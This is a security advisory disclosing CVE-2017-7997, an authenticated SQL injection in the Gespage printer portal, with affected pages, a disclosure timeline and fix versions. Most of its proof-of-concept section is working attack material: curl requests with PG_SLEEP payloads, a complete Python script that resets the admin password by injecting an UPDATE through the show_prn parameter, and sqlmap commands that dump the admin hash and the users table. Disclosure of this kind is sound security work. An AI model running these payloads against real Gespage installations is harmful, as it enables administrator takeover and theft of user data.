[CVE-2017-7997] Gespage SQL Injection vulnerability
Gespage is a web solution providing a printer portal. Official Website: http://www.gespage.com/
The web application does not properly filter several parameters sent by users, allowing authenticated SQL code injection (Stacked Queries – comment).
These vulnerabilities could allow attackers to retrieve / update data from the database through the application.
CVE ID: CVE-2017-7997
Access Vector: remote
Security Risk: high
Vulnerability: CWE-89
CVSS Base Score: 8.6
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Proof of Concept (dumping database data)
The parameters of these following pages are vulnerable:
- Page: http://URL/ges/webapp/users/prnow.jsp
Parameter: show_prn
HTTP Method: Post - Page: http://URL/ges/webapp/users/blhistory.jsp
Parameter: show_month
HTTP Method: Post - Page: http://URL/ges/webapp/users/prhistory.jsp
Parameter: show_month
HTTP Method: Post
We can then detect the SQL Injection by requesting the server with the curl tool, including a simple payload executing a sleep of different seconds:
- Normal request:
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1" --insecure -w "\nResponse Time:%{time_total}\n"
Curl output: Response Time:0,122
- Sleep Injection of 3 seconds into the request:
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1');SELECT PG_SLEEP(3)--" --insecure -w "\nResponse Time:%{time_total}\n"
Curl output: Response Time: 3,126
- Sleep Injection of 6 seconds into the request:
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1');SELECT PG_SLEEP(6)--" --insecure -w "\nResponse Time:%{time_total}\n"
Curl output: Response Time: 6,126
We created a dedicated python script to change the web admin password in order to compromise the web application:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
$ python update_gespage_pwd.py -c e06d40bc855c98751a5a2ff49daa -i -p 12345
[+] Generating the new admin password hash
=> Password hash (sha1) to inject in the Database: 8cb2237d0679ca88db6464eac60da96345513964
[+] Verifying connection to the web interface:
=> Connection OK
[+] Exploiting the SQL injection
=> Vulnerable page:
=> Posting Data : show_prn=A-PRINTER-ON-THE-WEB-LIST');UPDATE param_gespage SET param_value='8cb2237d0679ca88db6464eac60da96345513964' WHERE param_id='admin_pwd'--
[+] Go to the web admin interface, and log on with admin:12345
from argparse import ArgumentParser
from hashlib import sha1
from requests import Session
from urllib3 import disable_warnings
def exploit(args):
if args.ip_url[-1] != "/":
args.ip_url += "/"
print "[+] Generating the new admin password hash"
new_admin_pwd_hash = sha1(args.password).hexdigest()
print " => Password hash (sha1) to inject in the Database: %s" % (new_admin_pwd_hash)
print "[+] Verifying connection to the web interface: %s" % (args.ip_url)
web_session = web_connection(args.ip_url, args.cookie)
print "[+] Exploiting the SQL injection"
sql_injection(args.ip_url, web_session, args.cookie, new_admin_pwd_hash)
print "[+] Go to the web admin interface, %s and log on with admin:%s" % (args.ip_url.replace('gespage', 'admin'), args.password)
def sql_injection(url, session, user_cookie, new_admin_pwd_hash):
vulnerable_url = url + "webapp/users/prnow.jsp"
sql_update_query = "UPDATE param_gespage SET param_value='%s' WHERE param_id='admin_pwd'" % (new_admin_pwd_hash)
sql_injection_payload = "A-PRINTER-ON-THE-WEB-LIST');%s--" % (sql_update_query)
print " => Vulnerable page: %s" % (vulnerable_url)
print " => Posting Data : show_prn=%s" %(sql_injection_payload)
response = session.post(vulnerable_url, cookies={"JSESSIONID":user_cookie}, verify=False, allow_redirects=True, data={"show_prn":sql_injection_payload})
if not response.status_code == 200:
print " There is an error while posting the payload, try with sqlmap.py"
def web_connection(url, user_cookie):
session = Session()
response = session.get(url, verify=False, allow_redirects=False, cookies={"JSESSIONID":user_cookie})
if (response.status_code == 302 and "webapp/user_main.xhtml" in response.text):
print " => Connection OK"
return session
print " /!\ Error while connecting the web interface with the specified JSESSIONID cookie"
print " => Make sure given application URL and JSESSIONID cookie are correct "
if __name__ == '__main__':
parser = ArgumentParser(description='Exploit Gespage SQL injection by updating the admin password. You must create then specify an existing user in order to exploit the vulnerability')
parser.add_argument('-i','--ip_url', help='The web interface URL, ex: http://IP_ADDRESS:7181/gespage/',required=True)
parser.add_argument('-c','--cookie', help='JSESSIONID cookie of an authenticated user',required=True)
parser.add_argument('-p','--password', help='New admin password',required=True)
Using sqlmap, it is also possible to dump the content of the database, write other data, etc.
Dumping the admin password hash (if changed from the initial 123456 password):
python sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp" --cookie="JSESSIONID=YOUR_COOKIE_HERE" --data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3 --level 5 --technique TS -D public -T param_gespage -C param_value --time-sec 2 --dump --flush-session
Dumping the users table:
sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp" --cookie="JSESSIONID=YOU_COOKIE_HERE" --data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3 --level 5 --technique TS -D public -T users --time-sec 2 --dump
Timeline (dd/mm/yyyy)
- 06/03/2017 : Initial discovery
- 13/03/2017 : First contact attempt (Web form)
- 21/04/2017 : Second contact attempt (public e-mail address)
- 23/06/2017 : Phone call and successful e-mail contact
- 23/06/2017 : Technical details sent to the editor
- 20/07/2017 : Follow-up e-mail from Sysdream
- 27/07/2017 : Reply from Gespage: fix planned for major release 7.5.0 in late September
- 17/09/2017 : Informing the editor that we would publish in October
- 3/10/2017 : Gespage informs us that a patch was included in version 7.4.9 as well
- 02/01/2018 : Release of the advisory
Upgrade to Gespage 7.4.9 or above.
Affected versions
- Version <= 7.3.2
- Mickael KARATEKIN <m.karatekin -at- sysdream -dot- com>